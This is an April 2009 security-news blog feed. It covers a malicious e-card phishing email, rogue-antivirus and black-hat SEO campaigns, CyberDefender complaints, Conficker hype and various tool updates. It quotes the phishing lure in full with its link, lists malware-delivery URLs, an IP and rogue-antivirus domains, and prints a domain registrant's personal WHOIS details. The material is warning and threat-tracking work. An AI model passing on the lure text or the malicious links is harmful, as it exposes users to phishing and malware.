http://www.calendarofupdates.com/updates/index.php?act=calendar&code=showevent&calendar_id=1&event_id=54658

Malicious April eCard from greet2k.com

It seems we've got another ecard malpaign about to start. A few minutes ago, I received the following;

Hello,

A friend had sent you a
new electronic e-card
from our Free Electronic
e-Card Service.

Your e-Card number is: 091236A51201D3G

This e-Card was created today.

Use the following method to view your e-Card:

==============
Method
==============

To view your new greeting card,
simply click on the following link:

http://www.greet2k.com/ecards/cgi-bin/postbox.php?card=091236A51201D3G
(If your mail program does not support this feature, you will have to COPY and PASTE the address into your browser's location bar.)


Regards
Webmaster


Going to the URL in the e-mail results in an error stating "Sorry the card does not exists.", which likely means this one is still being setup. If we drop to the cgi-bin directory however, we see;



What is strange, is thedeadpit.com, was actually used in attacks a couple months ago, and is suspended so no longer resolves;

http://blog.scansafe.com/journal/2009/1/21/thedeadpitcom-tortures-web-surfers.html

Meaning our ecard author either hasn't done his homework, is a script kiddie that's not clever enough to check things actually work before using them, or is still setting it up (in which case, the domain in use will likely change).

WhoIs Information:

Referred to: whois.PublicDomainRegistry.com
By: whois.internic.net

Domain Name: THEDEADPIT.COM

Registrant:
N/A
Julia Taukova (donorsi@yahoo.com)
mustamae 4-11
Tallin
Harjumaa,14865
EE
Tel. +37.2953412

Creation Date: 03-Dec-2008
Expiration Date: 03-Dec-2009

Domain servers in listed order:
ns2.suspended-domain.com
ns1.suspended-domain.com


Ref:
http://hosts-file.net/?s=thedeadpit.com

Standard rules apply of course - NEVER EVER EVER click URL's or open attachments in e-mails.

Tuesday, 7 April 2009

Web of Trust (WoT) experiencing data center issues

Just a note folks. Most of you will likely already be aware that WoT (Web of Trust) has been down for a few hours.

I got in touch with my friend Sami at Web of Trust to find out what was going on and the following was her response;

Hi,

Our service provider is experiencing some major problems and the data center where our web servers are is down. The add-on is still working, right?

Sami


I've checked and can confirm the add-on is still working, so this issue only affects the website and forums etc. The add-on is unaffected by this.

I'll keep you posted on any developments.

/edit 19:19

Web of Trust is now back online folks!

Sunday, 5 April 2009

CyberDefender update: Sort of happy news!

In a very unexpected twist, it seems CyberDefender have seen the error of their ways (publicity hurt huh?) and have returned ALL of Slider51's $250. I am actually extremely surprised at this, for two reasons;

1. It's CyberDefender
2. They've backstepped on their original claim of their only being able to return half of it due to their "technical support" not being covered in the money back guarantee.

I fully expect them to continue putting people through this, especially given their history, but I'm glad they've returned the money they owed, and have actually honored their money back guarantee.

Just before I logged in to this forum, I checked my credit card activity online and noted two credits from CyberDefender - one for $129.99 and yesterday another for $120.00. I have my money back, and I am positive that had I not enlisted Icrontic's help that would never have happened.

Returning my money does NOT exonerate CyberDefender, however. They need to be investigated - "Sheur2XLC" Trojan doesn't exist, at least not under that name. Their "free" version (not free at all!) is the smoking gun - it contains the "hook" that leads one to believe there is nothing left to do but buy their software and let their technicians "fix" the unwary user's machine, because nobody else's software can identify or fix this threat. Once I bit down on the hook, I changed from a customer to their prey. Once a rogue, always a rogue. They may have given my $250 back, but they cost me many many hours of time and anguish, and consumed a bunch of Icrontic's time and expertise in helping me to weed trough their mess.


Perhaps now they'll also return the money they owe these folks?

http://www.complaintsboard.com/bycompany/cyber-defender-a102623.html

http://www.ripoffreport.com/searchresults.asp?q5=CyberDefender&Search=Search&q1=ALL&q4=&q6=&q3=&q2=&q7=&searchtype=0&submit2=Search%21

... and better yet, stop scamming people to begin with? (I can dream ....).

If you've been ripped off by CyberDefender, please do let me know, and if you're using it willingly (ad supported version or paid*), GET RID OF IT!.

* The last time I checked (2007), the paid version came with ad's too, which is one of the things that started the whole CD debacle. Sadly I'm unable to check whether or not the newer paid versions also contain these ad's as I highly doubt they're going to give me a licence so I can find it. So if you're using the paid version, PLEASE do let me know if ANY of the adverts I pointed out in the original article, are still present (or indeed, any new ones)



References

CyberDefender: Want your money back? Forget it!
http://hphosts.blogspot.com/2009/03/cyberdefender-want-your-money-back.html

Rogue company, CyberDefender, uses MBAM to clean infections
http://hphosts.blogspot.com/2009/03/rogue-company-cyberdefender-uses-mbam.html

CyberDefender: Early Deceit
http://mysteryfcm.co.uk/?mode=Articles&date=17-04-2007

CyberDefender and it’s adverts!
http://www.securitycadets.com/2007/05/cyberdefender-and-its-adverts/

Saturday, 4 April 2009

Portable Ubuntu Runs Ubuntu Inside Windows

Windows only: Free application Portable Ubuntu for Windows runs an entire Linux operating system as a Windows application. As if that weren't cool enough, it's portable, so you can carry it on your thumb drive.

Built from the same guts as the andLinux system that lets you seamlessly run Linux apps on your Windows desktop, Portable Ubuntu is a stand-alone package that runs a fairly standard (i.e. orange-colored, GNOME-based) version of the popular Ubuntu Linux distribution. It just doesn't bother creating its own desktop, and puts all its windows inside your Windows, er, windows.


Read the full article
http://lifehacker.com/5195999/portable-ubuntu-runs-ubuntu-inside-windows

Portable Ubuntu
http://portableubuntu.sourceforge.net

Download
http://portableubuntu.sourceforge.net/index.php?section=download

Friday, 3 April 2009

Black Hat SEO planting trojans p.5

After promoting some spyware and other rogue security software, now this is another list of compromised websites all with obfuscated javascript code inserted which result in:

hxxp://94.247.2.195/news/?id=100
(Analysis)

which call

hxxp://94.247.2.195/news/?id=2

and download a PDF with a random name QRB.pdf, WXk.pdf ...

File size: 10417 bytes
MD5: af28f3bc9424a3da7ff8bc84740bce93

VirusTotal Analysis: 0/40 (0%)

when running it load

hxxp://94.247.2.195/news/?id=10&


Read the full article
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html

Black Hat SEO and Rogue Antivirus p.6

Yet another WinWebSecurity variant this one through crack/serial websites and ad network

Fake ad:
BE PROTECTED! - FREE online system scan for viruses, trojans and malware.
Check it out - maybe someone have access to your PC right now! Protect yourself.

Which result in a complete set of redirection


Read the full article
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p6.html

Black Hat SEO and Rogue Antivirus P.4

This is just a sample of websites found in the previous days which are still running.
(with some ThreatExpert or VirusTotal reports)

Site running on these IPs can also be found on this blog and several other forums.

Hosted by Netelligent Hosting Services Inc on the IP 209.44.126.14

activesecurityshield.com - ThreatExpert Report
bestsecurityupdate.com - ThreatExpert Report
getscanonline.com - ThreatExpert Report
getsecuritywall.com - ThreatExpert Report
scanalertspage.com - ThreatExpert Report
scanbaseonline.com - ThreatExpert Report
onlinescandetect.com - ThreatExpert Report
runpcscannow.com - ThreatExpert Report
yourstabilitysystem.com - ThreatExpert Report
websecuritymaster.com - ThreatExpert Report
websecurityvoice.com - ThreatExpert Report

Hosted by Layered Technologies, Inc on the IP 72.233.34.6

zpmuwbtqqwkw.net

Hosted by ZlKon on the IP 94.247.3.3

greatvirusscan.com - ThreatExpert Report
webprotectionscan.com - ThreatExpert Report


Read the full article
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p4.html

Thursday, 2 April 2009

Windows Secrets misleading ParetoLogic spamvertising ......

Now, this is actually a paid advertisement, but the information is blatantly misleading. The Conficker worm did not go active on April 1. The Conficker worm has been active for months. On April 1 the Conficker worm changed an algorithm, that’s all. The Conficker worm is not one of the worst viruses in history. The worm is one of the most wide spread, but it is not known to have stolen data, as many threats have done. Conficker is not known to have sent spam. Conficker has not been confirmed as participating in DDOS for extortion attacks. Conficker has not been implicated in identity theft or credit card fraud.

When WindowsSecrets.com is willing to publish such sad hype and misleading information for a few bucks, you have to question the validity of any information they publish.


Read more
http://www.eset.com/threat-center/blog/?p=920

Essential Maintenance: vURL Online/Intranet server

Please note, due to essential maintenance, the *.mysteryfcm.co.uk server may respond slower than normal.

I'm trying to keep it online whilst this is performed, but once done, should reduce the errors people have been receiving (I've also fixed a bug in the code).

My apologies for any inconvenience this may cause.

/edit 02-04-2009 15:55

Maintenance is now complete.

Wednesday, 1 April 2009

Spambot Search Tool: v0.27

* Fixed StopForumSpam limit exceeded message accidentally displayed when it hasn't been (they've not implemented it yet, so it couldn't have been)

if you'd like to save yourself downloading it, you can fix it by changing;

if($bSFSLimit=true){


To;

if($bSFSLimit==true){


... in check_spammers_plain.php

Download:
http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

hpHOSTS - UPDATED April 1st, 2009

hpHOSTS - UPDATED April 1st, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 59,358 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 01/04/2009 17:45
  2. Last Verified: 01/04/2009 17:09

Download hpHosts now!
http://hosts-file.net/?s=Download

Apologies for the delay folks!

eEye: Conficker Detection Scanner and Patch Identification Utility

Found the following eEye security advisory in my inbox:

In response to Conficker, a breed of self-updating worms that is difficult to avoid, Researchers at eEye Digital Security (www.eeye.com/ ) have devised a Conficker detection engine that centers on running a network scan to detect hosts compromised or vulnerable to Conficker. In a proactive measure to protect users, starting today, organizations can download from eEye a free utility that is built around the company’s Retina Network Security Scanner that will detect hosts that are compromised with this latest worm and malicious botnet or do not have MS08-067 applied, the most effective propagation technique that Conficker uses.

The Retina Utility from eEye can be downloaded at: http://www.eeye.com/html/downloads/other/ConfickerScanner.html

In addition to the detection of the Conficker worm, eEye Digital Security's Blink Endpoint Protection Platform can effectively protect hosts, even if they are not patched, from the propagation of this worm. Using protocol based IPS analyzers, Blink can detect and stop the malicious traffic associated with MS08-067 and block the worm from self propagating. For installations that are already infected, Blink's multi layer antivirus engine will remove the Conficker worm and provide protection until a permanent remediation is performed on the host.


Learn more
http://www.eeye.com/html/conficker/index.html

Download
http://www.eeye.com/html/downloads/other/ConfickerScanner.html